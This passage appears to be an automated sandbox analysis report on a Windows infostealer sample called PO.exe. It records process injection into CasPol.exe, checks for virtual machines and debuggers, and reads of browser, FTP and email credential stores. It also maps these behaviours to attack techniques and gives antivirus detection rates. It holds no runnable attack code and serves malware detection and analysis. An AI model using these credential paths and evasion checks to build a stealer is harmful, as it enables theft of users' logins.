            Source: C:\Users\user\Desktop\PO.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\DiakonernesJump to behavior
            Source: C:\Users\user\Desktop\PO.exeFile created: C:\Users\user\AppData\Local\Temp\nsw9704.tmpJump to behavior
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/7@2/2
            Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00402095 CoCreateInstance,
            Source: C:\Users\user\Desktop\PO.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_004046DD GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1336:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1336:120:WilError_03
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: C:\Users\user\Desktop\PO.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\OneJump to behavior
            Source: PO.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000001.00000002.85191335084.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.84958072563.0000000001110000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_10002DE0 push eax; ret
            Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_032A2FF5 push cs; retf
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_01049297 push eax; iretd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_01467E2F push edi; retn 0000h
            Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,
            Source: C:\Users\user\Desktop\PO.exeFile created: C:\Users\user\AppData\Local\Temp\nsr9735.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\PO.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Users\user\Desktop\PO.exeFile opened: C:\Program Files\qga\qga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\qga\qga.exe
            Source: PO.exe, 00000001.00000002.85190215357.00000000006D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEP A
            Source: PO.exe, 00000001.00000002.85190215357.00000000006D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXES
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2364Thread sleep time: -3689348814741908s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2364Thread sleep time: -180000s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5828Thread sleep time: -34000s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_032A0D2D rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 9851
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information queried: ProcessInformation
            Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_0040596F CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
            Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_004064C1 FindFirstFileW,FindClose,
            Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_004027FB FindFirstFileW,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 30000
            Source: C:\Users\user\Desktop\PO.exeSystem information queried: ModuleInformation
            Source: C:\Users\user\Desktop\PO.exeAPI call chain: ExitProcess graph end node
            Source: C:\Users\user\Desktop\PO.exeAPI call chain: ExitProcess graph end node
            Source: PO.exe, 00000001.00000002.85191962285.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
            Source: PO.exe, 00000001.00000002.85191962285.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
            Source: PO.exe, 00000001.00000002.85190215357.00000000006D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exes
            Source: PO.exe, 00000001.00000002.85191962285.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
            Source: PO.exe, 00000001.00000002.85191962285.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
            Source: PO.exe, 00000001.00000002.85190215357.00000000006D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exep a
            Source: PO.exe, 00000001.00000002.85191962285.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
            Source: PO.exe, 00000001.00000002.85191962285.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
            Source: PO.exe, 00000001.00000002.85191962285.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
            Source: CasPol.exe, 00000004.00000002.89317737865.000000000152C000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.89316980207.00000000014CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: PO.exe, 00000001.00000002.85191962285.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
            Source: PO.exe, 00000001.00000002.85191962285.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
            Source: PO.exe, 00000001.00000002.85191962285.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
            Source: PO.exe, 00000001.00000002.85191962285.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
            Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,
            Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_032A0D2D rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_032C3323 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_032C5559 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_032A6243 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_032AB2AB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_032ABAFF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess queried: DebugPort
            Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_032C3341 LdrLoadDll,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Users\user\Desktop\PO.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 1110000
            Source: C:\Users\user\Desktop\PO.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\Desktop\PO.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_032A77C4 cpuid
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_004061A0 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000004.00000002.89336734210.000000001D8B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 7240, type: MEMORYSTR
            Source: Yara matchFile source: 00000004.00000002.89339190222.000000001D990000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.89336734210.000000001D8B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 7240, type: MEMORYSTR
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: Yara matchFile source: 00000004.00000002.89336734210.000000001D8B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 7240, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000004.00000002.89336734210.000000001D8B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 7240, type: MEMORYSTR
            Source: Yara matchFile source: 00000004.00000002.89339190222.000000001D990000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.89336734210.000000001D8B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 7240, type: MEMORYSTR
            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts211
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            1
            Disable or Modify Tools
            2
            OS Credential Dumping
            2
            File and Directory Discovery
            Remote Services1
            Archive Collected Data
            Exfiltration Over Other Network Medium1
            Web Service
            Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
            System Shutdown/Reboot
            Default Accounts1
            Native API
            1
            Windows Service
            1
            Access Token Manipulation
            1
            Obfuscated Files or Information
            21
            Input Capture
            127
            System Information Discovery
            Remote Desktop Protocol2
            Data from Local System
            Exfiltration Over Bluetooth1
            Ingress Tool Transfer
            Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)1
            Windows Service
            1
            DLL Side-Loading
            1
            Credentials in Registry
            331
            Security Software Discovery
            SMB/Windows Admin Shares1
            Email Collection
            Automated Exfiltration21
            Encrypted Channel
            Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)111
            Process Injection
            11
            Masquerading
            NTDS1
            Process Discovery
            Distributed Component Object Model21
            Input Capture
            Scheduled Transfer3
            Non-Application Layer Protocol
            SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script241
            Virtualization/Sandbox Evasion
            LSA Secrets241
            Virtualization/Sandbox Evasion
            SSH2
            Clipboard Data
            Data Transfer Size Limits14
            Application Layer Protocol
            Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.common1
            Access Token Manipulation
            Cached Domain Credentials1
            Application Window Discovery
            VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup Items111
            Process Injection
            DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            PO.exe29%VirustotalBrowse
            PO.exe27%ReversingLabsWin32.Downloader.Nemesis
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nsr9735.tmp\System.dll0%ReversingLabs
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://sFTel9k7EYFPshk.comt-Wl0%Avira URL Cloudsafe
